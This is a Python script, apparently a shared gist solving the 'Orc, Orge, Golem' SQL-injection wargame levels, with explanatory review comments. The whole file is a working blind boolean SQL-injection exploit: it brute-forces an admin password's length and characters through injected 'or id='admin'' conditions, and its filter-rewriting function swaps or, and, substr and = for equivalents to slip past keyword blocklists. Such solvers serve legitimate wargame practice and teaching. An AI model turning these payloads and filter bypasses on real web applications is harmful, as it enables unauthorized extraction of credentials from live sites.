@fxxntrbl
Created April 9, 2022 20:10
Orc, Orge, Golem
from string import ascii_lowercase, digits
from requests import get
# Session cookie sent with every request; left blank here and must be filled in
# before the script can get a meaningful response.
cookies = {"PHPSESSID": ""}

# Placeholder (Korean for "challenge url"); replace with the wargame level's URL.
target = "문제 url"

# Candidate characters tried at each position: a-z followed by 0-9.
# NOTE(review): anything outside this set (uppercase, punctuation) is never
# tested, so a value containing such a character cannot be recovered.
total = [*ascii_lowercase, *digits]
def fuck_filter(query: str) -> str:
    """Rewrite *query* so it avoids a fixed set of tokens.

    Applies four plain-text substitutions in order: ``or`` -> ``||``,
    ``and`` -> ``&&``, ``substr(`` -> ``substring(`` and ``=`` -> `` like ``.
    Presumably these are the tokens the challenge's input filter rejects.
    Each one has an equivalent spelling, which is why a token blocklist does
    not replace parameterized queries on the server side.

    The substitutions are substring-based, not token-aware: ``"password"``
    becomes ``"passw||d"``.
    """
    rewrites = (
        ("or", "||"),
        ("and", "&&"),
        ("substr(", "substring("),
        ("=", " like "),
    )
    # Order is preserved from the original; each pass sees the previous output.
    for needle, substitute in rewrites:
        query = query.replace(needle, substitute)
    return query
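def send_query(query: str) -> bool:
    """Send *query* as the ``pw`` parameter and report whether the marker appears.

    Issues one GET request to ``target`` with the module-level ``cookies`` and
    returns True when the response body contains ``"Hello admin"``.

    Raises:
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    # requests waits indefinitely when no timeout is given, so a single
    # stalled response would hang the whole run; fail after 10 seconds instead.
    resp = get(url=target, params={"pw": query}, cookies=cookies, timeout=10)
    return "Hello admin" in resp.text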
def guess_index():
    """Find the length of admin's ``pw`` by testing 1, 2, 3, ... in turn.

    Each candidate is checked with a ``length(pw)=N`` condition passed through
    ``fuck_filter`` and ``send_query``. The first N for which the marker
    appears is printed and returned.
    """
    # NOTE(review): there is no upper bound. If the marker never appears
    # (for instance because PHPSESSID is still empty) this loop never ends
    # and keeps sending requests.
    candidate = 1
    while not send_query(fuck_filter(f"' or id='admin' and length(pw)={candidate}#")):
        candidate += 1
    print(f"Found Index: {candidate}")
    return candidate
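def brute_attack_idx(index: int) -> str:
    """Return the character of admin's ``pw`` at position *index*.

    Tries every character in ``total`` with a ``substr(pw,index,1)='c'``
    condition and returns the first one for which ``send_query`` reports the
    marker. The caller passes positions starting at 1.

    Raises:
        LookupError: no character in ``total`` matched at this position.
    """
    for letter in total:
        query = fuck_filter(f"' or id='admin' and substr(pw,{index},1)='{letter}'#")
        if send_query(query):
            print(f"{index} => {letter}")
            return letter
    # The original fell off the end and returned None despite the ``-> str``
    # annotation, so the caller crashed later with an opaque TypeError on
    # ``password += None``. Fail here with the position that could not be resolved.
    raise LookupError(f"no candidate character matched at position {index}")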
def clear_for_me(password: str) -> str:
    """Submit the recovered *password* once as the ``pw`` parameter.

    The value is passed through ``fuck_filter`` and sent with ``send_query``;
    the result of the request is discarded.
    """
    # NOTE(review): annotated ``-> str`` but every path returns None.
    # NOTE(review): fuck_filter rewrites any "or", "and" or "=" inside the
    # password itself (e.g. "password" -> "passw||d"), so the submitted value
    # can differ from the recovered one.
    send_query(fuck_filter(password))
if __name__ == "__main__":
    # Recover the length first, then one character per position (1-based),
    # and finally submit the assembled value.
    index = guess_index()
    password = "".join(brute_attack_idx(i) for i in range(1, index + 1))
    clear_for_me(password)